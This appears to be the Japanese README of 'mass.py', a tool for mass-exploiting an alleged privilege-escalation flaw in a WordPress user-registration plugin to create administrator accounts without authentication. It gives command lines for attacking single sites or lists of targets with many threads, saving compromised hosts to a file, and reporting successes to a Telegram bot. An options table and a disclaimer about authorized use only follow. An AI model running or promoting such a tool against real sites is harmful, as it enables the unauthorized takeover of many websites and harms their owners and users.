
CVE-2026-11961 — UserRegistration: WordPress User Registration <= 5.2.2 権限昇格。誤って設定されたメンバーシップロール → 認証されていない管理者作成 → サイト侵害。CVSS 8.1
WordPress プラグイン User Registration & Membership に影響する CVE-2026-11961 の大量活用ツール。
--force)# ヘルプを表示
python3 mass.py -h
# 単一ターゲット
python3 mass.py -u https://target.com
# カスタム認証情報を使用した単一ターゲット
python3 mass.py \
-u https://target.com \
--username admin \
--password "StrongPassword123!"
# 複数ターゲット
python3 mass.py -l targets.txt -t 20
# 成功した結果を保存
python3 mass.py -l targets.txt -o results.jsonl
# ログファイルを書き込む
python3 mass.py -l targets.txt --log exploit.log
# Telegram 通知
python3 mass.py \
-l targets.txt \
--tg-token YOUR_BOT_TOKEN \
--tg-chat YOUR_CHAT_ID
# プロキシ
python3 mass.py \
-u https://target.com \
--proxy http://127.0.0.1:8080
# フォースモード
python3 mass.py -u https://target.com --force
このプロジェクトは、認可されたセキュリティ評価、防御的セキュリティ研究、および脆弱性検証のみを目的として提供されています。
本ソフトウェアを使用することにより、対象システムを評価するための明示的な許可を得ていることを確認したことになります。コンピュータシステムへの不正アクセスは禁止されており、該当する法律に違反する可能性があります。
著者および貢献者は、本プロジェクトの不正使用を推奨または容認せず、その使用に起因する誤用、損害、または法的結果について一切の責任を負いません。
JohenLastGen JLG NETWORK
| オプション | 説明 |
|---|
-h, --help | ヘルプメッセージを表示して終了 |
-u, --url | 単一ターゲットの URL |
-l, --list | ターゲット URL を含むファイル (1 行に 1 つ) |
--username | 管理者ユーザー名 (デフォルト: ランダム生成) |
--password | 管理者パスワード (デフォルト: ランダム生成) |
-t, --threads | 同時実行スレッド数 (デフォルト: 5) |
--timeout | リクエストタイムアウト (秒) (デフォルト: 15) |
-o, --output | 成功した結果を JSONL ファイルに保存 |
--log | コンソールログをファイルに保存 |
--proxy | HTTP/HTTPS プロキシ (例: http://127.0.0.1:8080) |
--force | バージョン検証をスキップして処理を続行 |
--tg-token | Telegram ボットトークン |
--tg-chat | Telegram チャット ID |